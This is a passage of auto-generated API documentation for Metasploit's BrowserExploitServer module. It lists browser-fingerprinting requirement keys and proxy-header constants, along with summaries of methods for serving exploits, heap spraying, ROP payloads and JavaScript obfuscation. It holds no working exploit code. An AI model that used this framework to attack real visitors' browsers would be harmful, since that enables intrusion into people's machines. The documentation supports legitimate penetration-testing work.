adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Remote/BrowserExploitServer.html
T

3323 lines
164 KiB
HTML
Raw Normal View History

Reboot gh-pages
2026-05-08 17:08:43 +00:00
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::BrowserExploitServer
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::BrowserExploitServer";
relpath = '../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../_index.html">Index (B)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span>
&raquo;
<span class="title">BrowserExploitServer</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::BrowserExploitServer
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="../JSObfu.html" title="Msf::Exploit::JSObfu (module)">JSObfu</a></span>, <span class='object_link'><a href="BrowserProfileManager.html" title="Msf::Exploit::Remote::BrowserProfileManager (module)">BrowserProfileManager</a></span>, <span class='object_link'><a href="HttpServer/HTML.html" title="Msf::Exploit::Remote::HttpServer::HTML (module)">HttpServer::HTML</a></span>, <span class='object_link'><a href="../RopDb.html" title="Msf::Exploit::RopDb (module)">Msf::Exploit::RopDb</a></span>, <span class='object_link'><a href="../../Module/UI/Line/Verbose.html" title="Msf::Module::UI::Line::Verbose (module)">Module::UI::Line::Verbose</a></span>, <span class='object_link'><a href="../../Module/UI/Message/Verbose.html" title="Msf::Module::UI::Message::Verbose (module)">Module::UI::Message::Verbose</a></span></dd>
</dl>
<dl>
<dt>Included in:</dt>
<dd><span class='object_link'><a href="BrowserAutopwn2.html" title="Msf::Exploit::Remote::BrowserAutopwn2 (module)">BrowserAutopwn2</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/browser_exploit_server.rb</dd>
</dl>
</div>
<h2>Defined Under Namespace</h2>
<p class="children">
<strong class="classes">Classes:</strong> <span class='object_link'><a href="BrowserExploitServer/BESException.html" title="Msf::Exploit::Remote::BrowserExploitServer::BESException (class)">BESException</a></span>
</p>
<h2>
Constant Summary
<small><a href="#" class="constants_summary_toggle">collapse</a></small>
</h2>
<dl class="constants">
<dt id="DEFAULT_COOKIE_NAME-constant" class="">DEFAULT_COOKIE_NAME =
<div class="docstring">
<div class="discussion">
<p>this must be static between runs, otherwise the older cookies will be ignored</p>
</div>
</div>
<div class="tags">
</div>
</dt>
<dd><pre class="code"><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>__ua</span><span class='tstring_end'>&#39;</span></span></pre></dd>
<dt id="PROXY_REQUEST_HEADER_SET-constant" class="">PROXY_REQUEST_HEADER_SET =
</dt>
<dd><pre class="code"><span class='const'>Set</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='qwords_beg'>%w{</span><span class='words_sep'>
</span><span class='tstring_content'>CLIENT_IP</span><span class='words_sep'>
</span><span class='tstring_content'>FORWARDED</span><span class='words_sep'>
</span><span class='tstring_content'>FORWARDED_FOR</span><span class='words_sep'>
</span><span class='tstring_content'>FORWARDED_FOR_IP</span><span class='words_sep'>
</span><span class='tstring_content'>HTTP_CLIENT_IP</span><span class='words_sep'>
</span><span class='tstring_content'>HTTP_FORWARDED</span><span class='words_sep'>
</span><span class='tstring_content'>HTTP_FORWARDED_FOR</span><span class='words_sep'>
</span><span class='tstring_content'>HTTP_FORWARDED_FOR_IP</span><span class='words_sep'>
</span><span class='tstring_content'>HTTP_PROXY_CONNECTION</span><span class='words_sep'>
</span><span class='tstring_content'>HTTP_VIA</span><span class='words_sep'>
</span><span class='tstring_content'>HTTP_X_FORWARDED</span><span class='words_sep'>
</span><span class='tstring_content'>HTTP_X_FORWARDED_FOR</span><span class='words_sep'>
</span><span class='tstring_content'>VIA</span><span class='words_sep'>
</span><span class='tstring_content'>X_FORWARDED</span><span class='words_sep'>
</span><span class='tstring_content'>X_FORWARDED_FOR</span><span class='words_sep'>
</span><span class='tstring_end'>}</span></span><span class='rparen'>)</span></pre></dd>
<dt id="REQUIREMENT_KEY_SET-constant" class="">REQUIREMENT_KEY_SET =
<div class="docstring">
<div class="discussion">
<p>Requirements a browser module can define in either BrowserRequirements or in targets</p>
</div>
</div>
<div class="tags">
</div>
</dt>
<dd><pre class="code"><span class='const'>Set</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='lbracket'>[</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>source</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='comment'># Return either &#39;script&#39; or &#39;headers&#39;
</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ua_name</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='comment'># Example: Returns &#39;MSIE&#39;
</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ua_ver</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='comment'># Example: Returns &#39;8.0&#39;, &#39;9.0&#39;
</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>os_name</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='comment'># Example: Returns &#39;Windows 7&#39;, &#39;Linux&#39;
</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>os_device</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='comment'># Example: Returns &#39;iPad&#39;, &#39;iPhone&#39;, etc
</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>os_vendor</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='comment'># Example: Returns &#39;Microsoft&#39;, &#39;Ubuntu&#39;, &#39;Apple&#39;, etc
</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>os_sp</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='comment'># Example: Returns &#39;SP2&#39;
</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>language</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='comment'># Example: Returns &#39;en-us&#39;
</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>arch</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='comment'># Example: Returns &#39;x86&#39;
</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>proxy</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='comment'># Returns &#39;true&#39; or &#39;false&#39;
</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>silverlight</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='comment'># Returns &#39;true&#39; or &#39;false&#39;
</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>office</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='comment'># Example: Returns &quot;2007&quot;, &quot;2010&quot;
</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>java</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='comment'># Example: Return &#39;1.6&#39;, or maybe &#39;1.6.0.0&#39; (depends)
</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>mshtml_build</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='comment'># mshtml build. Example: Returns &quot;65535&quot;
</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>flash</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='comment'># Example: Returns &quot;12.0&quot; (chrome/ff) or &quot;12.0.0.77&quot; (IE)
</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>vuln_test</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='comment'># Example: &quot;if(window.MyComponentIsInstalled)return true;&quot;,
</span> <span class='comment'># :activex is a special case.
</span> <span class='comment'># When you set this requirement in your module, this is how it should be:
</span> <span class='comment'># [:clsid=&gt;&#39;String&#39;, :method=&gt;&#39;String&#39;]
</span> <span class='comment'># Where each Hash is a test case
</span> <span class='comment'># But when BES receives this information, the JavaScript will return this format:
</span> <span class='comment'># &quot;CLSID=&gt;Method=&gt;Boolean;&quot;
</span> <span class='comment'># Also see: #has_bad_activex?
</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>activex</span><span class='tstring_end'>&#39;</span></span>
<span class='rbracket'>]</span><span class='rparen'>)</span></pre></dd>
</dl>
<h3 class="inherited">Constants included
from <span class='object_link'><a href="HttpServer/HTML.html" title="Msf::Exploit::Remote::HttpServer::HTML (module)">HttpServer::HTML</a></span></h3>
<p class="inherited"><span class='object_link'><a href="HttpServer/HTML.html#UTF_16_BE-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_16_BE (constant)">HttpServer::HTML::UTF_16_BE</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#UTF_16_BE_MARKER-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_16_BE_MARKER (constant)">HttpServer::HTML::UTF_16_BE_MARKER</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#UTF_16_LE-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_16_LE (constant)">HttpServer::HTML::UTF_16_LE</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#UTF_32_BE-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_32_BE (constant)">HttpServer::HTML::UTF_32_BE</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#UTF_32_LE-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_32_LE (constant)">HttpServer::HTML::UTF_32_LE</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#UTF_7-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_7 (constant)">HttpServer::HTML::UTF_7</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#UTF_7_ALL-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_7_ALL (constant)">HttpServer::HTML::UTF_7_ALL</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#UTF_8-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_8 (constant)">HttpServer::HTML::UTF_8</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#UTF_NONE-constant" title="Msf::Exploit::Remote::HttpServer::HTML::UTF_NONE (constant)">HttpServer::HTML::UTF_NONE</a></span></p>
<h2>Instance Attribute Summary</h2>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="SocketServer.html" title="Msf::Exploit::Remote::SocketServer (module)">SocketServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="SocketServer.html#service-instance_method" title="Msf::Exploit::Remote::SocketServer#service (method)">#service</a></span></p>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#browser_profile_prefix-instance_method" title="#browser_profile_prefix (instance method)">#<strong>browser_profile_prefix</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns a prefix thats unique to this browser exploit module.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#cleanup-instance_method" title="#cleanup (instance method)">#<strong>cleanup</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Cleans up target information owned by the current module.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#cookie_header-instance_method" title="#cookie_header (instance method)">#<strong>cookie_header</strong>(tag) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>HTTP header string for the tracking cookie.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#cookie_name-instance_method" title="#cookie_name (instance method)">#<strong>cookie_name</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Name of the tracking cookie.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#extract_requirements-instance_method" title="#extract_requirements (instance method)">#<strong>extract_requirements</strong>(reqs) &#x21d2; Hash </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns a hash of recognizable requirements.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_bad_requirements-instance_method" title="#get_bad_requirements (instance method)">#<strong>get_bad_requirements</strong>(profile) &#x21d2; Array </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns an array of items that do not meet the requirements.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_custom_404_url-instance_method" title="#get_custom_404_url (instance method)">#<strong>get_custom_404_url</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the custom 404 URL set by the user.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_detection_html-instance_method" title="#get_detection_html (instance method)">#<strong>get_detection_html</strong>(user_agent) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the code for client-side detection.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_module_resource-instance_method" title="#get_module_resource (instance method)">#<strong>get_module_resource</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the resource (URI) to the module to allow access to on_request_exploit.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_module_uri-instance_method" title="#get_module_uri (instance method)">#<strong>get_module_uri</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the absolute URL to the modules resource that points to on_request_exploit.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_payload-instance_method" title="#get_payload (instance method)">#<strong>get_payload</strong>(cli, browser_info) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Generates a target-specific payload, should be called by the module.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_target-instance_method" title="#get_target (instance method)">#<strong>get_target</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the current target.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#has_bad_activex%3F-instance_method" title="#has_bad_activex? (instance method)">#<strong>has_bad_activex?</strong>(ax) &#x21d2; Boolean </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns true if theres a bad ActiveX, otherwise false.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#has_proxy%3F-instance_method" title="#has_proxy? (instance method)">#<strong>has_proxy?</strong>(request) &#x21d2; Boolean </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Checks if the target is running a proxy.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(info = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#js_vuln_test-instance_method" title="#js_vuln_test (instance method)">#<strong>js_vuln_test</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Custom Javascript to check if a vulnerability is present.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#load_swf_detection-instance_method" title="#load_swf_detection (instance method)">#<strong>load_swf_detection</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#on_request_exploit-instance_method" title="#on_request_exploit (instance method)">#<strong>on_request_exploit</strong>(cli, request, browser_info) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Overriding method.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#on_request_uri-instance_method" title="#on_request_uri (instance method)">#<strong>on_request_uri</strong>(cli, request) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Handles exploit stages.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#process_browser_info-instance_method" title="#process_browser_info (instance method)">#<strong>process_browser_info</strong>(source, cli, request) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Registers target information to @target_profiles.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#retrieve_tag-instance_method" title="#retrieve_tag (instance method)">#<strong>retrieve_tag</strong>(cli, request) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Retrieves a tag.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#send_exploit_html-instance_method" title="#send_exploit_html (instance method)">#<strong>send_exploit_html</strong>(cli, template, headers = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Converts an ERB-based exploit template into HTML, and sends to client.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#setup-instance_method" title="#setup (instance method)">#<strong>setup</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#try_set_target-instance_method" title="#try_set_target (instance method)">#<strong>try_set_target</strong>(profile) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Sets the target automatically based on what requirements are met.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Module/UI/Message/Verbose.html" title="Msf::Module::UI::Message::Verbose (module)">Module::UI::Message::Verbose</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Module/UI/Message/Verbose.html#vprint_error-instance_method" title="Msf::Module::UI::Message::Verbose#vprint_error (method)">#vprint_error</a></span>, <span class='object_link'><a href="../../Module/UI/Message/Verbose.html#vprint_good-instance_method" title="Msf::Module::UI::Message::Verbose#vprint_good (method)">#vprint_good</a></span>, <span class='object_link'><a href="../../Module/UI/Message/Verbose.html#vprint_status-instance_method" title="Msf::Module::UI::Message::Verbose#vprint_status (method)">#vprint_status</a></span>, <span class='object_link'><a href="../../Module/UI/Message/Verbose.html#vprint_warning-instance_method" title="Msf::Module::UI::Message::Verbose#vprint_warning (method)">#vprint_warning</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Module/UI/Line/Verbose.html" title="Msf::Module::UI::Line::Verbose (module)">Module::UI::Line::Verbose</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Module/UI/Line/Verbose.html#vprint_line-instance_method" title="Msf::Module::UI::Line::Verbose#vprint_line (method)">#vprint_line</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="BrowserProfileManager.html" title="Msf::Exploit::Remote::BrowserProfileManager (module)">BrowserProfileManager</a></span></h3>
<p class="inherited"><span class='object_link'><a href="BrowserProfileManager.html#browser_profile-instance_method" title="Msf::Exploit::Remote::BrowserProfileManager#browser_profile (method)">#browser_profile</a></span>, <span class='object_link'><a href="BrowserProfileManager.html#clear_browser_profiles-instance_method" title="Msf::Exploit::Remote::BrowserProfileManager#clear_browser_profiles (method)">#clear_browser_profiles</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../JSObfu.html" title="Msf::Exploit::JSObfu (module)">JSObfu</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../JSObfu.html#js_obfuscate-instance_method" title="Msf::Exploit::JSObfu#js_obfuscate (method)">#js_obfuscate</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../RopDb.html" title="Msf::Exploit::RopDb (module)">Msf::Exploit::RopDb</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../RopDb.html#generate_rop_payload-instance_method" title="Msf::Exploit::RopDb#generate_rop_payload (method)">#generate_rop_payload</a></span>, <span class='object_link'><a href="../RopDb.html#has_rop%3F-instance_method" title="Msf::Exploit::RopDb#has_rop? (method)">#has_rop?</a></span>, <span class='object_link'><a href="../RopDb.html#rop_junk-instance_method" title="Msf::Exploit::RopDb#rop_junk (method)">#rop_junk</a></span>, <span class='object_link'><a href="../RopDb.html#rop_nop-instance_method" title="Msf::Exploit::RopDb#rop_nop (method)">#rop_nop</a></span>, <span class='object_link'><a href="../RopDb.html#select_rop-instance_method" title="Msf::Exploit::RopDb#select_rop (method)">#select_rop</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="HttpServer/HTML.html" title="Msf::Exploit::Remote::HttpServer::HTML (module)">HttpServer::HTML</a></span></h3>
<p class="inherited"><span class='object_link'><a href="HttpServer/HTML.html#encrypt_js-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#encrypt_js (method)">#encrypt_js</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#heaplib-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#heaplib (method)">#heaplib</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_ajax_download-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_ajax_download (method)">#js_ajax_download</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_ajax_post-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_ajax_post (method)">#js_ajax_post</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_base64-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_base64 (method)">#js_base64</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_explib2-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_explib2 (method)">#js_explib2</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_explib2_payload-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_explib2_payload (method)">#js_explib2_payload</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_heap_spray-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_heap_spray (method)">#js_heap_spray</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_heaplib2-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_heaplib2 (method)">#js_heaplib2</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_ie_addons_detect-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_ie_addons_detect (method)">#js_ie_addons_detect</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_misc_addons_detect-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_misc_addons_detect (method)">#js_misc_addons_detect</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_mstime_malloc-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_mstime_malloc (method)">#js_mstime_malloc</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_os_detect-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_os_detect (method)">#js_os_detect</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_property_spray-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_property_spray (method)">#js_property_spray</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#obfuscate_js-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#obfuscate_js (method)">#obfuscate_js</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#send_response_html-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#send_response_html (method)">#send_response_html</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="HttpServer.html" title="Msf::Exploit::Remote::HttpServer (module)">HttpServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="HttpServer.html#add_resource-instance_method" title="Msf::Exploit::Remote::HttpServer#add_resource (method)">#add_resource</a></span>, <span class='object_link'><a href="HttpServer.html#add_robots_resource-instance_method" title="Msf::Exploit::Remote::HttpServer#add_robots_resource (method)">#add_robots_resource</a></span>, <span class='object_link'><a href="HttpServer.html#autofilter-instance_method" title="Msf::Exploit::Remote::HttpServer#autofilter (method)">#autofilter</a></span>, <span class='object_link'><a href="HttpServer.html#check_dependencies-instance_method" title="Msf::Exploit::Remote::HttpServer#check_dependencies (method)">#check_dependencies</a></span>, <span class='object_link'><a href="HttpServer.html#cli-instance_method" title="Msf::Exploit::Remote::HttpServer#cli (method)">#cli</a></span>, <span class='object_link'><a href="HttpServer.html#cli=-instance_method" title="Msf::Exploit::Remote::HttpServer#cli= (method)">#cli=</a></span>, <span class='object_link'><a href="HttpServer.html#close_client-instance_method" title="Msf::Exploit::Remote::HttpServer#close_client (method)">#close_client</a></span>, <span class='object_link'><a href="HttpServer.html#create_response-instance_method" title="Msf::Exploit::Remote::HttpServer#create_response (method)">#create_response</a></span>, <span class='object_link'><a href="HttpServer.html#fingerprint_user_agent-instance_method" title="Msf::Exploit::Remote::HttpServer#fingerprint_user_agent (method)">#fingerprint_user_agent</a></span>, <span class='object_link'><a href="HttpServer.html#get_resource-instance_method" title="Msf::Exploit::Remote::HttpServer#get_resource (method)">#get_resource</a></span>, <span class='object_link'><a href="HttpServer.html#get_uri-instance_method" title="Msf::Exploit::Remote::HttpServer#get_uri (method)">#get_uri</a></span>, <span class='object_link'><a href="HttpServer.html#hardcoded_uripath-instance_method" title="Msf::Exploit::Remote::HttpServer#hardcoded_uripath (method)">#hardcoded_uripath</a></span>, <span class='object_link'><a href="HttpServer.html#print_prefix-instance_method" title="Msf::Exploit::Remote::HttpServer#print_prefix (method)">#print_prefix</a></span>, <span class='object_link'><a href="HttpServer.html#random_uri-instance_method" title="Msf::Exploit::Remote::HttpServer#random_uri (method)">#random_uri</a></span>, <span class='object_link'><a href="HttpServer.html#regenerate_payload-instance_method" title="Msf::Exploit::Remote::HttpServer#regenerate_payload (method)">#regenerate_payload</a></span>, <span class='object_link'><a href="HttpServer.html#remove_resource-instance_method" title="Msf::Exploit::Remote::HttpServer#remove_resource (method)">#remove_resource</a></span>, <span class='object_link'><a href="HttpServer.html#report_user_agent-instance_method" title="Msf::Exploit::Remote::HttpServer#report_user_agent (method)">#report_user_agent</a></span>, <span class='object_link'><a href="HttpServer.html#resource_uri-instance_method" title="Msf::Exploit::Remote::HttpServer#resource_uri (method)">#resource_uri</a></span>, <span class='object_link'><a href="HttpServer.html#send_local_redirect-instance_method" title="Msf::Exploit::Remote::HttpServer#send_local_redirect (method)">#send_local_redirect</a></span>, <span class='object_link'><a href="HttpServer.html#send_redirect-instance_method" title="Msf::Exploit::Remote::HttpServer#send_redirect (method)">#send_redirect</a></span>, <span class='object_link'><a href="HttpServer.html#send_response-instance_method" title="Msf::Exploit::Remote::HttpServer#send_response (method)">#send_response</a></span>, <span class='object_link'><a href="HttpServer.html#send_robots-instance_method" title="Msf::Exploit::Remote::HttpServer#send_robots (method)">#send_robots</a></span>, <span class='object_link'><a href="HttpServer.html#srvhost_addr-instance_method" title="Msf::Exploit::Remote::HttpServer#srvhost_addr (method)">#srvhost_addr</a></span>, <span class='object_link'><a href="HttpServer.html#srvport-instance_method" title
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Auxiliary/Report.html" title="Msf::Auxiliary::Report (module)">Auxiliary::Report</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Auxiliary/Report.html#active_db%3F-instance_method" title="Msf::Auxiliary::Report#active_db? (method)">#active_db?</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_cracked_credential-instance_method" title="Msf::Auxiliary::Report#create_cracked_credential (method)">#create_cracked_credential</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_credential-instance_method" title="Msf::Auxiliary::Report#create_credential (method)">#create_credential</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_credential_and_login-instance_method" title="Msf::Auxiliary::Report#create_credential_and_login (method)">#create_credential_and_login</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_credential_login-instance_method" title="Msf::Auxiliary::Report#create_credential_login (method)">#create_credential_login</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#db-instance_method" title="Msf::Auxiliary::Report#db (method)">#db</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#db_warning_given%3F-instance_method" title="Msf::Auxiliary::Report#db_warning_given? (method)">#db_warning_given?</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#get_client-instance_method" title="Msf::Auxiliary::Report#get_client (method)">#get_client</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#get_host-instance_method" title="Msf::Auxiliary::Report#get_host (method)">#get_host</a></span>, <span class='object_link'><a 